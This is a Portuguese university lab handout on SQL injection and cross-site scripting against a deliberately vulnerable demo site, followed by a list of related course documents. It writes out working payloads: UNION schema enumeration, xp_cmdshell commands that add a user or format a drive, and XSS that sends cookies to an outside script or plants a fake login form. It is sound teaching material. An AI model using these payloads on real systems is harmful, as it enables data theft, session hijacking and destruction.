Aula 6: Vulnerabilidades Web

Tamanho: px
Começar a partir da página:

Download "Aula 6: Vulnerabilidades Web"

Transcrição

1 Aula 6: Vulnerabilidades Web Exploits of a Mom Objectivos: Compreender duas vulnerabilidades encontradas em aplicações web: SQL Injection; Cross-site Scripting. Pensar sobre formas de evitar as vulnerabilidades. 1.2 Instruções: Open Web Application Security Project (OWASP): SQL Injection Walkthrough: Advanced SQL Injection In SQL Server Applications: SQL Injection 1 SQL Injection on Wikipedia: How to exploit the SQL Injection Attack (Example App) A empresa Fabrikam Lda desenvolveu uma nova funcionalidade de pesquisa de produtos na sua página. No entanto a sua implementação é bastante deficiente. Vamos explorar essas deficiencias para conduzir um ataque conhecido como SQL Injection. 1 Adaptado de 1/4

2 1. Começe por abrir um browser no endereço e utilize a aplicação para procurar produtos. 2. Imagine como poderá ser o código mais simples que executa esta consulta. Escreva uma possível consulta SQL, assumindo que o texto a procurar se encontra numa variável chamada DATA e é simplesmente concatenado à cadeira de caracteres que constitui a consulta. (dica: select <cola>, <colb> from <Tabela> where <colb> like %DATA% order by <cola>;) 3. Utilizando a resposta anterior, imagine uma forma de fazer a consulta devolver todos os registos. (dica: select <cola>, <colb> from <Tabela> where <colb> like %DATA% OR 1=1; -- order by <cola>;) A partir do momento que tiver realizado este passo com sucesso, encontra-se em posição de efectivamente enviar qualquer tipo de comando SQL para ser executado! 4. Descobrir informação sobre a base de dados: a. Podemos utilizar a clausula UNION para adicionar linhas à consulta SQL. Nessas linhas retornamos a informação que pretendemos. Alguns exemplos: i. UNION select null,name,null from sys.databases; (Utilizamos null para fazer com que o número de colunas da consulta adicionada seja igual ao nº de colunas da consulta original. Neste caso devolvemos o nome das bases de dados na terceira coluna, através de uma consulta à tabela de sistema sys.databases). ii. UNION select null, table_name, null from <BaseDeDados>.information_schema.tables; iii. UNION select null, column_name, null from <BaseDeDados>.information_schema.columns where table_name='<tabela>'; iv. UNION select null,<cola>+', '+<ColB>+', '+< >,null from <Table>; 5. Introduzir informação na Base de Dados: a. update <Tabela> set <ColA>=<Valor> where <ColB>=<Valor>; 6. Dependendo da configuração e do servidor de base de dados, temos uma variedade de opções. Apenas alguns exemplos possíveis (não funcionam neste caso particular): a. exec xp_cmdshell 'net user hacker P@ssw0rd /add' b. ' exec xp_cmdshell 'format c:' c.. 7. Que medidas poderiam tomar tanto o programador como o administrador deste sistema para prevenir este tipo de ataques? 2/4

3 1.2.2 Cross-site Scripting 2 Vulnerability Test Application: XSS on Wikipedia: Google XSS Example Real World XSS A empresa Fabrikam Lda permite que sejam afixadas mensagens públicas no seu site. As mensagens podem ser afixadas por utilizadores anónimos ou utilizadores autenticados. Infelizmente, o texto das mensagens não é adequadamente validado antes de ser apresentado aos utilizadores Abra o Internet Explorer no endereço e utilize a aplicação para afixar e ver mensagens bem intencionadas : a. A implementação desta aplicação utiliza ASP.NET e foi muito simplificada; Temos duas configurações relevantes no ficheiro web.config: i. <pages validaterequest="false"/> ii. <authentication mode="forms"/> Se não souber, procure saber qual é o significado destas opções. b. A aplicação aceita como utilizador da aplicação válido qualquer login com a password dei. 2. Agora vamos tomar o papel de um atacante : a. Abra o endereço da aplicação. Verifique que não está ligado como um utilizador da aplicação (faça login utilizando a password dei ). b. Agora podemos construir uma mensagem para tirar partido de uma vulnerabilidade do tipo XSS. Alguns exemplos: i. <a href="x" onmouseover="javascript:alert('código javascript Executado!')">X</a> ii. <a href="x" onmouseover="javascript:alert('cookie='+document.cookie)">x</a> iii. <a href="x" onmouseover="javascript:document.location.replace(' isep.ipp.pt')">x</a> iv. %3C%61%20%68%72%65%66%3D%22%58%22%20%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%22%6A %61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F %6E%2E%72%65%70%6C%61%63%65%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%64%65%69%2E %69%73%65%70%2E%69%70%70%2E%70%74%2F%27%29%22%3E%58%3C%2F%61%3E v. <a href="x" onmouseover="javascript:document.location.replace(' isep.ipp.pt/~npereira/aulas/esegi/07/xss/rcv.php?cookie='+document.cookie)">x</a> vi. <br><br>please login with the form below before proceeding:<form action=" <tr><td>login:</td><td><input type=text length=20 name=login></td></tr><tr><td>password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=login></form> vii. <input type='button' value='change Personality!' onclick='changepersonality()'/> <script> function changepersonality() { var image = document.images[0] if (image.src.match('isep')) { image.src = 'art/fabrikam.gif'; } else { image.src = ' } } </script> 2 Adaptado de 3/4

4 3. Agora tomamos novamente o papel de um utilizador legítimo: a. Faça login utilizando a password dei ; b. Leia a mensagem introduzida pelo atacante; c. Verifique o código da página. Conforme a mensagem que experimentou, poderá verificar que atacante conseguiu controlar totalmente o conteúdo da página; d. O atacante consegue também adquirir o cookie com informação sobre a sessão do utilizador. Isto poderá significar que o atacante consegue agir como se fosse o utilizador legítimo. Acha que este ataque seria prevenido por um canal de comunicação seguro? 4/4

5 XSS vulnerabilities in Php-Nuke 6.x through 7.3: SQL injection vulnerability in index.php: Google XSS Example Real World XSS Questões: 5/4

Quando a máquina terminar o arranque e lhe pedir as credenciais para entrar, introduza as seguintes:

Quando a máquina terminar o arranque e lhe pedir as credenciais para entrar, introduza as seguintes: Segurança Informa tica e nas Organizaço es Vulnerabilidades na Web (V1.1) Este trabalho deve ser realizado na máquina virtual Ubuntu10tm que pode descarregar de ftp://www.ieeta.pt/avzdatastore/vulnerable%20linux/ubuntu10tm.zip,

Leia mais

Segurança Informática e nas Organizações. Guiões das Aulas Práticas

Segurança Informática e nas Organizações. Guiões das Aulas Práticas Segurança Informática e nas Organizações Guiões das Aulas Práticas André Zúquete 1 e Hélder Gomes 2 1 Departamento de Eletrónica, Telecomunicações e Informática 2 Escola Superior de Tecnologia e Gestão

Leia mais

Segurança Informática e nas Organizações. Guiões das Aulas Práticas

Segurança Informática e nas Organizações. Guiões das Aulas Práticas Segurança Informática e nas Organizações Guiões das Aulas Práticas André Zúquete 1 e Hélder Gomes 2 1 Departamento de Eletrónica, Telecomunicações e Informática 2 Escola Superior de Tecnologia e Gestão

Leia mais

Lidando com Armazenamento de Dados

Lidando com Armazenamento de Dados Lidando com Armazenamento de Dados Paulo Ricardo Lisboa de Almeida 1 Armazenamento de Dados A grande maioria das aplicações possuem algum mecanismo para armazenagem de dados Dados de usuários Permissões

Leia mais

Cross-Site Scripting. Paulo Ricardo Lisboa de Almeida. 1 Universidade Positivo

Cross-Site Scripting. Paulo Ricardo Lisboa de Almeida. 1 Universidade Positivo Cross-Site Scripting Paulo Ricardo Lisboa de Almeida 1 Cross-Site Scripting - XSS Foco no ataque aos usuários finais O servidor não é diretamente afetado Dificuldade na detecção dos ataques Podem comprometer

Leia mais

Cadeira de Tecnologias de Informação. Ano lectivo 2009/2010. Sites dinâmicos. Com Expression Web TI2009/10 EWD_1. Filipa Pires da Silva (2009)

Cadeira de Tecnologias de Informação. Ano lectivo 2009/2010. Sites dinâmicos. Com Expression Web TI2009/10 EWD_1. Filipa Pires da Silva (2009) Cadeira de Tecnologias de Informação Ano lectivo 2009/2010 Sites dinâmicos Com Expression Web TI2009/10 EWD_1 .ASPX vs.html HTML: HTML é uma linguagem para descrever páginas web HTML significa Hyper Text

Leia mais

Introdução 20 Diagramas de fluxos de dados 20 O processo de elaboração de DFD 22 Regras práticas para a elaboração de DFD 24 Dicionário de dados 26

Introdução 20 Diagramas de fluxos de dados 20 O processo de elaboração de DFD 22 Regras práticas para a elaboração de DFD 24 Dicionário de dados 26 ÍNDICE MÓDULO 1 ANÁLISE DE SISTEMAS 9 1.1 SISTEMAS DE INFORMAÇÃO 10 Sistema conceito e exemplos 10 Dados e informação 11 Sistema de informação conceito e componentes 12 Sistema de informação e sistemas

Leia mais

Cross-Site Scripting (XSS): Entendendo o conceito e seus tipos

Cross-Site Scripting (XSS): Entendendo o conceito e seus tipos Cross-Site Scripting (XSS): Entendendo o conceito e seus tipos Talvez a vulnerabilidade de segurança de aplicações web mais comum e mais debatido é Cross-Site Scripting (XSS). Quando tais vulnerabilidades

Leia mais

ASP.Net 4.0 com Mobile Apps

ASP.Net 4.0 com Mobile Apps ASP.Net 4.0 com Mobile Apps Web Design & Development Formato: Mentored - Presencial Preço: 395 ( Os valores apresentados não incluem IVA. Oferta de IVA a particulares e estudantes. ) Horário: Flexível

Leia mais

Ataques a Aplicações Web

Ataques a Aplicações Web Ataques a Aplicações Web - Uma visão prática - Carlos Nilton A. Corrêa http://www.carlosnilton.com.br/ ccorrea@unimedrj.com.br @cnacorrea Agenda 1. Panorama da (in)segurança web 2. Google hacking 3. SQL

Leia mais

RELATÓRIOS PENTEST S

RELATÓRIOS PENTEST S FACULDADE DE TECNOLOGIA SENAC GOIÁS SEGURANÇA DA INFORMAÇÃO - V ALLAN BERG BARBOSA GUIMARÃES CARLOS ANTÔNIO DA SILVA JUAREZ JUNIOR FREITAS DE OLIVEIRA RELATÓRIOS PENTEST S GOIÂNIA 2016/2 ALLAN BERG BARBOSA

Leia mais

AULA APLICAÇÕES PARA WEB SESSÕES E LOGIN E SENHA

AULA APLICAÇÕES PARA WEB SESSÕES E LOGIN E SENHA Sumário Construção de sistema Administrativo... 1 Sistema de Login... 2 SQL INJECTION... 2 Técnicas para Evitar Ataques... 2 Formulário de Login e Senha fará parte do DEFAULT... 5 LOGAR... 5 boas... 6

Leia mais

Bases de Dados. Lab 7: Desenvolvimento de aplicações com PHP

Bases de Dados. Lab 7: Desenvolvimento de aplicações com PHP Departamento de Engenharia Informática 2013/2014 Bases de Dados Lab 7: Desenvolvimento de aplicações com PHP 1º semestre Este lab é uma continuação dos anteriores. Se realizou os labs anteriores, a base

Leia mais

Tarefa Orientada 9 Base de Dados Pagamentos

Tarefa Orientada 9 Base de Dados Pagamentos Tarefa Orientada 9 Base de Dados Pagamentos Objectivos: Criar as tabelas da base de dados Pagamentos Criar um diagrama da base de dados Inserir registos com os dados de teste Criar as tabelas da base de

Leia mais

Tarefa Orientada 17 Scripts

Tarefa Orientada 17 Scripts Tarefa Orientada 17 Scripts Objectivos: Declaração de variáveis escalares Declaração de variáveis do tipo tabela Tabelas temporárias Estruturas Condicionais Estruturas de Repetição Tratamento de erros

Leia mais

Petter Anderson Lopes Arbitragem, Desenvolvimento Seguro, Segurança Ofensiva e Forense Computacional

Petter Anderson Lopes Arbitragem, Desenvolvimento Seguro, Segurança Ofensiva e Forense Computacional Requerente: Metadados Assessoria e Sistemas. Empresa: Metadados Assessoria e Sistemas Especialista: Petter Anderson Lopes. Período: fevereiro de 2019. Modelo: Pentest, OWASP Top 10 2013 compliance. OWASP

Leia mais

2.1-Criar BD e Tabelas.

2.1-Criar BD e Tabelas. 2 2.1-Criar BD e Tabelas. Vamos ao phpmyadmin: Financiado pelo FSE Pág: 1 Tabelas Financiado pelo FSE Pág: 2 2.2-Definir o site e sua conexão. Financiado pelo FSE Pág: 3 Financiado pelo FSE Pág: 4 Depois

Leia mais

LAB 7 Cookies e Sessões em PHP

LAB 7 Cookies e Sessões em PHP LAB 7 Cookies e Sessões em PHP 1. Assume-se neste lab que concluiu com sucesso o LAB6. Copie todos os ficheiros da pasta LAB6 para a pasta LAB7. 2. Construa o template (formulario) blog_template.html {MENU_1}

Leia mais

Desenvolvimento de Sistemas Web Prof. Leandro Roberto. Aula 18 JavaScript: Eventos MySQL PHP (insert, update e delete)

Desenvolvimento de Sistemas Web Prof. Leandro Roberto. Aula 18 JavaScript: Eventos MySQL PHP (insert, update e delete) Desenvolvimento de Sistemas Web Prof. Leandro Roberto Aula 18 JavaScript: Eventos MySQL PHP (insert, update e delete) JavaScript Eventos Alguns eventos de uma página HTML podem ser interceptados e programados

Leia mais

Escrever scripts de PHP com HTML

Escrever scripts de PHP com HTML Escrever scripts de PHP com HTML PHP é uma linguagem de programação de scripts para serem interpretados no lado dos servidores. Numa fase inicial (1995), PHP surgiu com o significado de Personal Home Pages

Leia mais

Banco de Dados SQL injection

Banco de Dados SQL injection Universidade Estadual de Mato Grosso do Sul Curso de Computação, Licenciatura Banco de Dados SQL injection '1 = 1 Prof. José Gonçalves Dias Neto profneto_ti@hotmail.com SQL Injection - Introdução Injeção

Leia mais

IMPLEMENTAÇÃO DE BANCO DE DADOS

IMPLEMENTAÇÃO DE BANCO DE DADOS IMPLEMENTAÇÃO DE BANCO DE DADOS MODULO 2 LINGUAGEM SQL CONTEÚDO 2. LINGUAGEM SQL 2.1 Linguagens de Definição de Dados (DDL) 2.1.1 Criação de tabela: CREATE 2.1.2 Alteração de Tabela: ALTER 2.1.3 Exclusão

Leia mais

Laboratório de Sistemas e Serviços Web

Laboratório de Sistemas e Serviços Web Ministério da Ciência, Tecnologia e Ensino Superior U.C. 21182 Laboratório de Sistemas e Serviços Web Época Recurso, 2017/2018 INSTRUÇÕES PARA A RESOLUÇÃO DO EXAME, ACONSELHA-SE QUE LEIA ATENTAMENTE O

Leia mais

Bases de Dados. Lab 1: Introdução ao ambiente. Figura 1. Base de dados de exemplo

Bases de Dados. Lab 1: Introdução ao ambiente. Figura 1. Base de dados de exemplo Departamento de Engenharia Informática 2013/2014 Bases de Dados Lab 1: Introdução ao ambiente 1º semestre O ficheiro bank.sql contém um conjunto de instruções SQL para criar a base de dados de exemplo

Leia mais

Nota prévia... XXI 1. PHP, Apache Server e MySQL... 1

Nota prévia... XXI 1. PHP, Apache Server e MySQL... 1 VII Índice Geral Nota prévia... XXI 1. PHP, Apache Server e MySQL... 1 1.1. Introdução... 1 1.2. Linguagem PHP... 1 1.2.1. Suporte a diferentes sistemas operativos... 2 1.2.2. Suporte a Sistemas de Gestão

Leia mais

Segurança na WEB Ambiente WEB estático

Segurança na WEB Ambiente WEB estático Segurança de Redes Segurança na WEB Prof. Rodrigo Rocha prof.rodrigorocha@yahoo.com Servidor IIS Apache Cliente Browser IE FireFox Ambiente WEB estático 1 Ambiente Web Dinâmico Servidor Web Cliente Navegadores

Leia mais

22/05/2012 CRIANDO UM PROJETO COM TELAS ESTRUTURA DA APLICAÇÃO LOGIN BANCO DE DADOS TAREFAS PHP MYSQL PARTE 2

22/05/2012 CRIANDO UM PROJETO COM TELAS ESTRUTURA DA APLICAÇÃO LOGIN BANCO DE DADOS TAREFAS PHP MYSQL PARTE 2 CRIANDO UM PROJETO COM TELAS Páginas com formulário Acesso ao banco de dados PHP MYSQL PARTE 2 Luciana Balieiro Cosme ESTRUTURA DA APLICAÇÃO LOGIN BANCO DE DADOS # Coluna Nome e Tipo 1 codigo int(11) AUTO_INCREMENT

Leia mais

SQL CREATE DATABASE. MySQL, SQL Server, Access, Oracle, Sybase, DB2, e outras base de dados utilizam o SQL.

SQL CREATE DATABASE. MySQL, SQL Server, Access, Oracle, Sybase, DB2, e outras base de dados utilizam o SQL. LINGUAGEM SQL SQL CREATE DATABASE MySQL, SQL Server, Access, Oracle, Sybase, DB2, e outras base de dados utilizam o SQL. SQL CREATE TABLE SQL NOT NULL O valor NOT NULL obriga que o campo contenha sempre

Leia mais

Manual de instalação do SQL 2012

Manual de instalação do SQL 2012 Manual de instalação do SQL 2012 Instalando o SQL Server 2012 para o funcionamento do Shop Control 9 Insira o DVD de instalação do Shop Control 9 em seu servidor; Na sua aréa de trabalho clique em Computador,

Leia mais

MC561 / ES5461. Digitalização para & Reencaminhamento de Fax

MC561 / ES5461. Digitalização para  & Reencaminhamento de Fax MC561 / ES5461 Rev. 3 Digitalização para Email & Pág. 1 / 14 Índice Informação a recolher... 3 Acesso ao Equipamento via Web Browser... 4 Configurações de E-mail... 5 Introduzir Endereços Email e Digitalizar...

Leia mais

SEGURANÇA EM APLICAÇÕES WEB PROF.: PAULO RICARDO LISBOA DE ALMEIDA

SEGURANÇA EM APLICAÇÕES WEB PROF.: PAULO RICARDO LISBOA DE ALMEIDA SEGURANÇA EM APLICAÇÕES WEB PROF.: PAULO RICARDO LISBOA DE ALMEIDA APLICAÇÕES DESKTOP VERSUS WEB Quais são as diferenças do ponto de vista da segurança APLICAÇÕES DESKTOP VERSUS WEB Em uma aplicação desktop,

Leia mais

Aula 4. Ivan Sendin. 30 de agosto de FACOM - Universidade Federal de Uberlândia SEG-4.

Aula 4. Ivan Sendin. 30 de agosto de FACOM - Universidade Federal de Uberlândia SEG-4. Segurança da Informação Aula 4 FACOM - Universidade Federal de Uberlândia ivansendin@yahoo.com,sendin@ufu.br 30 de agosto de 2017 Google Hacking Utilizar uma search engine para buscar falhas específicas

Leia mais

Microsoft Office

Microsoft Office 2018 Índice Como instalar a aplicação... 2 Como gerir instalações... 9 1 Como instalar a aplicação Para poder instalar o Microsoft Office 365 @UP, deverá: 1. Saber qual o seu Login para utilização deste

Leia mais

Integração por Web Services

Integração por Web Services Integração por Web Services Versão 1.1 Maio 2010 Índice Índice... 2 Introdução... 3 Arquitectura PRIMAVERA... 4 User Interface... 4 Motor... 4 Interface para o Administrador... 5 Motores PRIMAVERA em Web

Leia mais

Conselho Geral da Ordem Dos Advogados Departamento Informático

Conselho Geral da Ordem Dos Advogados Departamento Informático Nota Introdutória: Este documento destina-se a guiá-lo(a) através dos vários procedimentos necessários para configurar a sua caixa de correio da Ordem dos Advogados, no programa Windows Live Mail Versão

Leia mais

Como criar um banco de dados usando o mysql

Como criar um banco de dados usando o mysql Como criar um banco de dados usando o mysql 1º Passo: Tenha instalado em seu computador o software XAMPP. Clique aqui para fazer o download. 2º Passo: O XAMPP faz a instalação normal, apenas clicando next,

Leia mais

Maycon Maia Vitali ( 0ut0fBound )

Maycon Maia Vitali ( 0ut0fBound ) Maycon Maia Vitali ( 0ut0fBound ) mayconmaia@yahoo.com.br Sobre o palestrante Pra que segurança? Ataques de Cross-Site-Script (XSS) Ataques de File Include Ataques de SQL Injection Mecanismos de proteção

Leia mais

Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu

Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Prof. Hederson Velasco Ramos Uma boa maneira de analisar ameaças no nível dos aplicativo é organiza las por categoria de

Leia mais

SQL (com MySQL) Apresentação OBJETIVOS. Programação

SQL (com MySQL) Apresentação OBJETIVOS. Programação SQL (com MySQL) Programação Formato: Mentored - Presencial Preço: 395 ( Os valores apresentados não incluem IVA. Oferta de IVA a particulares e estudantes. ) Horário: Flexível das 2ª a 6ª das 9h às 21h30

Leia mais

Desenvolvimento de Aplicações para Internet Aula 6

Desenvolvimento de Aplicações para Internet Aula 6 Desenvolvimento de Aplicações para Internet Aula 6 Celso Olivete Júnior olivete@fct.unesp.br Na aula passada 1. Desenvolvimento do banco de dados 2. Desenvolvimento da interface do sistema 3. Desenvolver

Leia mais

Oracle Database 10g: Fundamentos de SQL e PL/SQL

Oracle Database 10g: Fundamentos de SQL e PL/SQL Oracle University Contact Us: 0-800-167225 Oracle Database 10g: Fundamentos de SQL e PL/SQL Duration: 5 Dias O que é que gostaria de aprender Conheça os fundamentos de SQL e PL/SQL usando o SQL Developer

Leia mais

Bases de Dados. Lab 1: Introdução ao ambiente

Bases de Dados. Lab 1: Introdução ao ambiente Departamento de Engenharia Informática 2009/2010 Bases de Dados Lab 1: Introdução ao ambiente 1º semestre O ficheiro bank.sql contém um conjunto de instruções SQL para criar a base de dados de exemplo

Leia mais

Benvindo ao Curso de Introdução ao Firebird com Ferramenta de Relatórios!

Benvindo ao Curso de Introdução ao Firebird com Ferramenta de Relatórios! (Apresentação SQL Manager Lite for InterBase and Firebird) Benvindo ao Curso de Introdução ao Firebird com Ferramenta de Relatórios! Ferramenta de alta performance para a otimização da administração de

Leia mais

saída durante o runtime Usando Functions de uma Única Linha para Personalizar Relatórios Mostrar as diferenças entre as functions SQL de uma única

saída durante o runtime Usando Functions de uma Única Linha para Personalizar Relatórios Mostrar as diferenças entre as functions SQL de uma única Tópicos do Curso: Introdução Listar os principais recursos do Banco de Dados Oracle 10g Apresentar uma visão geral de: componentes, plataforma de internet, servidor de aplicações e suite do desenvolvedor

Leia mais

NOTA: Neste tutorial foi utilizado o Visual Studio 2010 para criar o Projeto Web no qual iremos realizar os passos abaixo.

NOTA: Neste tutorial foi utilizado o Visual Studio 2010 para criar o Projeto Web no qual iremos realizar os passos abaixo. TUTORIAL 03 Criando uma base de dados SQL Server com o Visual Studio ETAPA 1: Criando um novo Web Site usando o Visual Studio 2010 NOTA: Neste tutorial foi utilizado o Visual Studio 2010 para criar o Projeto

Leia mais

Welington R. Monteiro Fatea Segurança 09/2016

Welington R. Monteiro Fatea Segurança 09/2016 Welington R. Monteiro Fatea Segurança 09/2016 É uma vulnerabilidade encontrada em aplicações web, que permite a injeção de códigos no lado do cliente, ou seja, altera a página apenas no computador do usuário.

Leia mais

VULNERABILIDADES WEB v.2.2

VULNERABILIDADES WEB v.2.2 VULNERABILIDADES WEB v.2.2 $ whoami Sgt NILSON Sangy Computer Hacking Forensic Investigator Analista de Segurança da Informação Guerreiro Cibernético $ ls -l /etc 1. Contextualização 2. OWASP 2.1. Injeção

Leia mais

--Depois que o backup for concluído, restaurá-lo no servidor Mirror usando a opção WITH NORECOVERY.

--Depois que o backup for concluído, restaurá-lo no servidor Mirror usando a opção WITH NORECOVERY. --Depois que o backup for concluído, restaurá-lo no servidor Mirror usando a opção WITH NORECOVERY. --Executar no SERVER-02/Mirror server RESTORE DATABASE CanalUseSQL FROM DISK = N'D:\DBBackup\CanalUseSQL.bak'

Leia mais

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos os ataques e suas respectivas

Leia mais

C A P I T U L O 5 C O M A N D O D E F L U X O

C A P I T U L O 5 C O M A N D O D E F L U X O C A P I T U L O 5 C O M A N D O D E F L U X O Sempre que for necessária uma tomada de decisão dentro de um programa, você terá que utilizar um comando condicional, pois é por meio dele que o PHP decidirá

Leia mais

C A P I T U L O 10 F U N Ç Õ E S I N T E R N A S P H P P A R A B A N C O D E D A D O S

C A P I T U L O 10 F U N Ç Õ E S I N T E R N A S P H P P A R A B A N C O D E D A D O S C A P I T U L O 10 F U N Ç Õ E S I N T E R N A S P H P P A R A B A N C O D E D A D O S Para desenvolver um sistema que utilizará um banco de dados, precisamos estabelecer uma conexão entre a linguagem

Leia mais

XSS - CROSS-SITE SCRIPTING

XSS - CROSS-SITE SCRIPTING Segurança XSS - CROSS-SITE SCRIPTING XSS - CROSS-SITE SCRIPTING Vamos supor a seguinte situação: O site ingenuo.com tem um fórum As pessoas escrevem comentários nesse fórum e eles são salvos diretamente

Leia mais

Aula 3. Ivan Sendin. 22 de agosto de FACOM - Universidade Federal de Uberlândia SEG. Ivan Sendin.

Aula 3. Ivan Sendin. 22 de agosto de FACOM - Universidade Federal de Uberlândia SEG. Ivan Sendin. Segurança Aula 3 FACOM - Universidade Federal de Uberlândia ivansendin@yahoo.com,sendin@ufu.br 22 de agosto de 2018 Informação =$$ Confidencialidade, Integridade e Disponibilidade (qual é mais importante?)

Leia mais

Guia Google Cloud Print

Guia Google Cloud Print Guia Google Cloud Print Informações sobre o Google Cloud Print Imprimir com o Google Cloud Print Anexo Conteúdo Como Interpretar os Manuais... 2 Símbolos utilizados nos manuais... 2 Declaração de exoneração

Leia mais

Bases de Dados 2005/2006. Aula 5

Bases de Dados 2005/2006. Aula 5 Bases de Dados 2005/2006 Aula 5 Sumário -1. (T.P.C.) Indique diferenças entre uma tabela e uma relação. 0. A base de dados Projecto 1. SQL Join (variantes) a. Cross Join b. Equi-Join c. Natural Join d.

Leia mais

SMA PROCEDIMENTO DE ACESSO AO SISTEMA SMA PROCEDIMENTO DE ACESSO AO SISTEMA

SMA PROCEDIMENTO DE ACESSO AO SISTEMA SMA PROCEDIMENTO DE ACESSO AO SISTEMA SMA PROCEDIMENTO DE ACESSO AO SISTEMA Índice 1. Pré-requisitos... 2 2. Configurando opções de segurança do Internet Explorer... 3 3. Requisição e Instalação dos certificados de acesso... 5 3.1. Instalação

Leia mais

3.1-Criar BD e Tabelas.

3.1-Criar BD e Tabelas. 3 Sistema que permita mudar apenas o seu próprio registo de login. Suponha que o site tem a possibilidade de efectuar um registo e que através desse registo tenha acesso a uma área restrita do site e que

Leia mais

SQL INJECTION: ENTENDENDO E EVITANDO. MAGALHÃES, Felipe. B. ¹, BASTOS, Rafael. R² RESUMO

SQL INJECTION: ENTENDENDO E EVITANDO. MAGALHÃES, Felipe. B. ¹, BASTOS, Rafael. R² RESUMO SQL INJECTION: ENTENDENDO E EVITANDO MAGALHÃES, Felipe. B. ¹, BASTOS, Rafael. R² ¹ Faculdade IDEAU Bagé RS Brasil magalhaesbg@gmail.com ² Faculdade IDEAU Bagé RS Brasil rafaelrodriguesbastos@gmail.com

Leia mais

AULA 8. Ambientes Visuais 8.1. OBJETIVO DA AULA SQL (Structured Query Language)

AULA 8. Ambientes Visuais 8.1. OBJETIVO DA AULA SQL (Structured Query Language) AULA 8 8.1. OBJETIVO DA AULA Relembrar conceitos e recursos básicos apresentados nas aulas anteriores, dar continuidade nas codificações iniciadas e ainda não finalizadas, explorar acesso a banco de dados

Leia mais

Taxonomia Comum para a Rede Nacional de CSIRTs

Taxonomia Comum para a Rede Nacional de CSIRTs Taxonomia Comum para a Rede Nacional de CSIRTs Taxonomia Comum para a Rede Nacional de CSIRTs Dezembro de 2012 ÍNDICE 1 INTRODUÇÃO... 2 2 CLASSIFICAÇÃO DE INCIDENTES... 3 i 1 INTRODUÇÃO Este documento

Leia mais

TESTES DE SEGURANÇA FESTOCK 9 DE JUNHO DE 2011 VERSÃO 1.0

TESTES DE SEGURANÇA FESTOCK 9 DE JUNHO DE 2011 VERSÃO 1.0 TESTES DE SEGURANÇA FESTOCK 9 DE JUNHO DE 2011 VERSÃO 1.0 Índice Testes de segurança Medidas de segurança Manipulação do URL SQL Injection Observações Securtiy Task Checklist Recon and analysis Test handling

Leia mais

AJAX. Prof. Marcos Alexandruk

AJAX. Prof. Marcos Alexandruk Prof. Marcos Alexandruk m.alexandruk@hotmail.com Asynchronous JavaScript and XML Não é uma "nova tecnologia" Utiliza os recursos já existentes do JavaScript Jesse James Garret utilizou o termo pela primeira

Leia mais

Gestão de Segurança da Informação. Segurança de Banco de Dados ( SQL Injection, APBIDS, Modelagem )

Gestão de Segurança da Informação. Segurança de Banco de Dados ( SQL Injection, APBIDS, Modelagem ) Segurança de Aplicações e Banco de Dados Gestão de Segurança da Informação pós-graduação Lato Sensu Segurança de Banco de Dados ( SQL Injection, APBIDS, Modelagem ) Patrick Tracanelli Francisco Temponi

Leia mais

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nos últimos anos uma das vulnerabilidades mais exploradas por usuários mal-intencionados é a injeção de SQL, onde o atacante realiza uma

Leia mais

ORACLE 11 G INTRODUÇÃO AO ORACLE, SQL,PL/SQL

ORACLE 11 G INTRODUÇÃO AO ORACLE, SQL,PL/SQL ORACLE 11 G INTRODUÇÃO AO ORACLE, SQL,PL/SQL Objetivo: No curso Oracle 11G Introdução ao Oracle, SQL, PL/SQL será abordado desde a introdução da tecnologia do banco de dados em questão como todos os conceitos

Leia mais

Criação de uma aplicação Web ASP.NET MVC 4

Criação de uma aplicação Web ASP.NET MVC 4 Criação de uma aplicação Web ASP.NET MVC 4 usando Code First, com Roles (VS2012) Baseado no artigo de Scott Allen Roles in ASP.NET MVC4 : http://odetocode.com/blogs/scott/archive/2012/08/31/seeding membership

Leia mais

Banco de Dados. -Aprendendo conceitos -Usando o SQL Conf para: -Conectar no banco de dados -Criar, alterar, excluir e consultar estruturas de tabelas

Banco de Dados. -Aprendendo conceitos -Usando o SQL Conf para: -Conectar no banco de dados -Criar, alterar, excluir e consultar estruturas de tabelas Banco de Dados -Aprendendo conceitos -Usando o SQL Conf para: -Conectar no banco de dados -Criar, alterar, excluir e consultar estruturas de tabelas O que é banco de dados? São conjuntos de registros dispostos

Leia mais

Prof. Esp. Andrew Rodrigues 1

Prof. Esp. Andrew Rodrigues   1 Prof. Esp. Andrew Rodrigues www.andrewrodrigues.com.br www.andrewrodrigues.com.br 1 PHP em Ação PHP é uma linguagem de programação que pode fazer todo o tipo de coisas: avaliar dados de formulários enviados

Leia mais

LAB 8 em PHP. 1. Assume-se neste lab que concluiu com sucesso o LAB7. Copie todos os ficheiros da pasta LAB7 para a pasta LAB8.

LAB 8  em PHP. 1. Assume-se neste lab que concluiu com sucesso o LAB7. Copie todos os ficheiros da pasta LAB7 para a pasta LAB8. LAB 8 Email em PHP 1. Assume-se neste lab que concluiu com sucesso o LAB7. Copie todos os ficheiros da pasta LAB7 para a pasta LAB8. a12345@daw:~/public_html$ mkdir LAB8 a12345@daw:~/public_html$ cp -a

Leia mais

PHP. Apresentação OBJETIVOS. Programação

PHP. Apresentação OBJETIVOS. Programação PHP Programação Formato: Mentored - Online Preço: 415 ( Os valores apresentados não incluem IVA. Oferta de IVA a particulares e estudantes. ) Horário: Flexível das 24h/24h Duração: ~80h Validade: 3 meses

Leia mais

Segurança em aplicações Web. Exemplos e Casos Práticos em

Segurança em aplicações Web. Exemplos e Casos Práticos em Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST 7º Ciclo de Apresentações. 28/Março/2007 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header

Leia mais

